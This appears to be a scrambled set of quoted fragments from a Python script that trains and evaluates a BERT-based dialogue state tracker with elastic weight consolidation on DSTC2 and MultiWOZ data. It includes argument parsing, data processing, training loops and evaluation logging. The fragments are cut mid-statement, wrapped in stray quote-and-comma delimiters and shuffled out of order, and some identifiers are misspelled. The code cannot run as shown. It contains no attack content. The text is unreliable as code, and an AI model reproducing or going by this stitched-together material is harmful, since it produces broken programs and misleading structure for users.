NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a", "global_step = 0 last_update = None best_loss = None #### EWC: calculate Fisher", "config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for", "= \"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]: dialogue index, line[1]: turn index", "logger.info(\"label: \" + label_info) logger.info(\"previous label: \" + prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx", "idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples,", "of 2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on", "label_token_ids, label_len = [], [] for labels in label_list: token_ids, lens = get_label_embedding(labels,", "param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate},", "+ args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids,", "Valid prev acc=%.6f ***\" \\ % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss =", "Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc))", "drawfig == True: #if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1,", "all_padding_len = [0, 0] max_turn = 0 for (ex_index, example) in enumerate(examples): if", "ontology[\"informable\"] del ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif", "== -1: break text = {} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label']", "ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"),", "slot embeddings are ordered as [previous slots + present target slots] slot_token_ids, slot_len", "= 0 last_update = None best_loss = None #### EWC: calculate Fisher ewc", "batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps,", "pdb import matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s", "key in sorted(result.keys()): logger.info(\" %s = %s\", key, str(result[key])) writer.write(\"%s = %s\\n\" %", "tokens += tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) + 1 input_ids = tokenizer.convert_tokens_to_ids(tokens)", "- prev_turn_idx - 1) assert len(features) % max_turn_length == 0 if prev_dialogue_idx is", "== 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[]", "+= 1 if (step + 1) % args.gradient_accumulation_steps == 0: # modify learning", "0 for sid, slot in enumerate(class_count): slot_class_acc = 0 for vid, value in", "= None all_padding = [0] * max_seq_length all_padding_len = [0, 0] max_turn =", "args.fp16: try: from apex.optimizers import FP16_Optimizer from apex.optimizers import FusedAdam except ImportError: raise", "# Load data ############################################################################### # Get Processor processor = Processor(args) prev_label_list = processor.get_prev_labels()", "not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc", "sampler=train_sampler, batch_size=args.train_batch_size) ## Dev ## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples,", "dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu", "# Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test example for simple sequence", "def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation)", "\" + prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not", "args.fp16)) if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >=", "all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len,", "for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch in trange(1): #### TRAIN model.train()", "writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze", "axs[turn].set_title(\"turn %d slot: %s label: %s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()])", "Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of the data corpus') parser.add_argument(\"--bert_model\", default=None, type=str,", "2: tokens_a = tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"]", "examples for the training and dev sets.\"\"\" prev_dialogue_index = None examples = []", "user utterance text_b = line[3] # line[3]: system response label = [ line[4+idx]", "logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test example for", "all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f in", "= loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is not", "0 assert len(input_ids) == max_seq_length label_id, label_info = _get_label(example.label, label_list) prev_label_id, prev_label_info =", "key == config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else:", "parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input sequence length after WordPiece tokenization. \\n\"", "t_total = num_train_steps if args.local_rank != -1: t_total = t_total // torch.distributed.get_world_size() if", "label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0] == -1: break text =", "desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids =", "= '' label_map = [{_label: i for i, _label in enumerate(labels)} for labels", "_ = batch if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ =", "prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss_, loss_slot, acc, acc_slot,", "text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" % text) writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\" %", "all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis *****\") logger.info(\" Num examples = %d\", len(eval_examples))", "self.text_b = text_b self.label = label # Target slots in this training task", "n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev =", "== 0 all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for", "= os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained model that you have fine-tuned ptr_model", "del_list.append(key) if ('rnn.' in key): # rename rnn -> nbt, rename_list.append(key) for key", "','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d,", "cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int,", "type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA when available\")", "(label, label_map[i][label]) return label_id, label_info features = [] prev_dialogue_idx = None all_padding =", "for distributed training on gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps',", "* (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length == 0 all_input_ids", "not None: if eval_loss_slot is None: eval_loss_slot = [ l * nb_eval_ex for", "base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See base class.\"\"\"", "performing a backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use 16-bit float precision instead", "bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory of the pretrained", "type=str, required=True, help='location of the data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert pre-trained", "'\\t'.join([str(val[1].item()) for val in total_acc_slot]) } out_file_name = 'eval_results' if args.target_slot=='all': out_file_name +=", "= open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for", "acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss", "args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({})", "device) if args.fp16: model.half() # Load pretrained model # in the case that", "logger.info('Processor: target slots: '+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\"", "if summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr']", "input_ids self.input_len = input_len self.label_id = label_id self.prev_label_id = prev_label_id # trained slots", "= _get_label(example.label, label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"***", "= torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0): eval_examples", "accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir,", "***\" % (last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f,", "help=\"Loss scaling to improve fp16 numeric stability. Only used when fp16 set to", "= 0, 0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples = 0, 0", "import pdb import matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s -", "all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features = [] for label", "Load data ############################################################################### # Get Processor processor = Processor(args) prev_label_list = processor.get_prev_labels() #", "previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present task", "training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total", "ignore comments (starting with '#') continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor for", "= guid self.text_a = text_a self.text_b = text_b self.label = label # Target", "int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random seed manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed)", "= curr_turn_idx if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] *", "del ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir", "all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num examples = %d\", len(eval_examples))", "def main(): parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of", "logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x) for", "= prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1)", "- len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids =", "max_turn_length): \"\"\"Loads a data file into a list of `InputBatch`s.\"\"\" slot_dim = len(label_list)", "exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard:", "dev_loss = 0 dev_acc = 0 dev_loss_slot, dev_acc_slot = None, None nb_dev_examples, nb_dev_steps", "type=int, default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of updates steps", "logger.info(\" Num steps = %d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device),", "prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex", "*****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", 1)", "\"w\") as writer: for dialog in incorrect_dialogs: for turn in dialog: text =", "global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot):", "use distributed and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale", "os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval results *****\")", "== -1 or args.no_cuda: device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else", "= [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\")", "of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4, help=\"the number of", "type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate", "parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on the test set.\") args = parser.parse_args()", "and (args.local_rank == -1 or torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids,", "slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'),", "args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids,", "# \" + text_a text_b = line[3] + \" # \" + text_b", "logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x) for x in tokens]))", "loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot,", "-1, 0).item() dev_loss += loss.item() * num_valid_turn dev_acc += acc.item() * num_valid_turn prev_num_valid_turn", "prev_dialogue_index = None examples = [] for (i, line) in enumerate(lines): guid =", "parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({}) already exists", "label def _get_label(label, label_list): label_id = [] label_info = '' label_map = [{_label:", "logger.info(\" %s = %s\", key, str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ###############################################################################", "= \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if args.local_rank !=", "torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss = dev_loss best_acc = dev_acc logger.info(\"*** Model", "prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {} for val, idx in zip(torch.cat([eval_acc_slot,", "= %s\", key, str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ############################################################################### # Analyze:", "label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len =", "examples = %d\", len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size) logger.info(\" Num steps", "= input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc,", "label_ids.size(2) for slot in range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] ==", "BERT uses lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer is", "_, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean()", "= BeliefTracker(args, num_labels, device) if args.fp16: model.half() # Load pretrained model # in", "_ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean()", "the belief tracking dataset (GLUE version).\"\"\" def __init__(self, config): super(Processor, self).__init__() import json", "apex.optimizers import FusedAdam except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to", "raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name", "for f in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates", "label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids)", "Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if epoch > 100", "desc=\"Iteration\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, _ =", "ptr_model = torch.load(output_model_file, map_location=device) del_list = [] for key in ptr_model.keys(): if ('slot'", "with torch.no_grad(): if n_gpu == 1: loss, loss_slot, acc, acc_slot, _ = model(input_ids,", "0 for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t in", "if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length", "\"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.prev_slot] def _create_examples(self, lines,", "- len(input_ids)) # Note: padding idx = 0 assert len(input_ids) == max_seq_length label_id,", "at least \\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif", "help=\"Number of updates steps to accumulate before performing a backward/update pass.\") parser.add_argument('--fp16', action='store_true',", "param_group in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad() global_step += 1 # Perform", "device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu > 1: model = torch.nn.DataParallel(model) if", "summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad() global_step", "processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer,", "(max_seq_length - len(input_ids)) # Note: padding idx = 0 assert len(input_ids) == max_seq_length", "nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format( device,", "for slot in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\":", "of all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong prev_slot_id =", "t_total = t_total // torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers import FP16_Optimizer from", "None: if eval_loss_slot is None: eval_loss_slot = [ l * nb_eval_ex for l", "(sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file)", "\"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir,", "ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\" %", "shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total", "for distance between label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size", "with torch.no_grad(): if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids,", "labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len =", "+= acc_slot * nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot", "= FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate,", "= int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids =", "be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model = BeliefTracker(args, num_labels,", "to the alphabetic order of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots", "logger.info(\"***** Eval results *****\") for key in sorted(result.keys()): logger.info(\" %s = %s\", key,", "padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total input turn length. \\n\" \"Sequences longer", "help=\"Total number of training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of", "pred_slot = model(input_ids, input_len, label_ids, 1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item() nslot =", "all_padding = [0] * max_seq_length all_padding_len = [0, 0] max_turn = 0 for", "action='store_true', help=\"Set this flag if you are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true',", "*****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size)", "key in del_list: del ptr_model[key] if n_gpu > 1: model = model.module state", "prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss, loss_slot, acc, acc_slot,", "'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt", "optimizer_grouped_parameters = [ {'params': [p for n, p in param_optimizer if not any(nd", "dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer: for dialog", "InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer,", "= [0, 0] max_turn = 0 for (ex_index, example) in enumerate(examples): if max_turn", "sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for x in", "for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids", "True: #if (len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1,", "import BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import SummaryWriter import pdb import", "i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace('", "############################################################################### # Main ############################################################################### def main(): parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir',", "< attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot", "in loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot = [ l * prev_num_valid_turn", "= ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc prev_loss, _, prev_acc, prev_acc_slot,", "loss=%.6f, Valid prev acc=%.6f ***\" \\ % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss", "if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b = None", "input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the sequence length. input_ids += [0]", "in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01,", "%(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class", "= [0] * max_seq_length all_padding_len = [0, 0] max_turn = 0 for (ex_index,", "system response label = [ line[4+idx] for idx in self.target_slot_idx] prev_label = [", "=='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") == -1:", "'lr': args.learning_rate}, {'params': [p for n, p in param_optimizer if any(nd in n", "if n_gpu == 1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss", "* nb_eval_ex if loss_slot is not None: if eval_loss_slot is None: eval_loss_slot =", "bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory of the pretrained BERT model\") parser.add_argument(\"--task_name\",", "name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True,", "\\n\" \"than this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in", "is not None: if eval_loss_slot is None: eval_loss_slot = [ l * nb_eval_ex", "turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False", "tokens_a + [\"[SEP]\"] input_len = [len(tokens), 0] if tokens_b: tokens += tokens_b +", "parser.add_argument('--fp16', action='store_true', help=\"Whether to use 16-bit float precision instead of 32-bit\") parser.add_argument('--loss_scale', type=float,", "prev_dev_acc)) dev_loss = round(dev_loss, 6) if last_update is None or dev_loss < best_loss:", "'#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b = None if example.text_b: tokens_b", "after WordPiece tokenization. \\n\" \"Sequences longer than this will be truncated, and sequences", "incorrect_dialogs: for turn in dialog: text = turn['input'] + '\\t' for label, pred", "+ 1) % args.gradient_accumulation_steps == 0: # modify learning rate with special warm", "= loss_ + args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids,", "continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor for the belief tracking dataset (GLUE", "eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {}", "= [] for key in ptr_model.keys(): if ('slot_lookup' in key) or ('value_lookup' in", "get_optimizer_grouped_parameters(model): param_optimizer = [(n, p) for n, p in model.named_parameters() if p.requires_grad] no_decay", "= parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train: raise ValueError(\"Output directory ({}) already", "_hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id = %d) ' % (label, label_map[i][label]) return", "eval_loss_slot is None: # for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy", "nb_eval_ex else: eval_acc_slot += acc_slot * nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss,", "for val in label_list] incorrect_dialogs = [] attention_draw = 5 for input_ids, input_len,", "parameter: {}, should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) #", "np.sum(outputs == labels) def warmup_linear(x, warmup=0.002): if x < warmup: return x /", "_ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ =", "excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='', type=str, required=True, help=\"Previous trained slots. ex.", 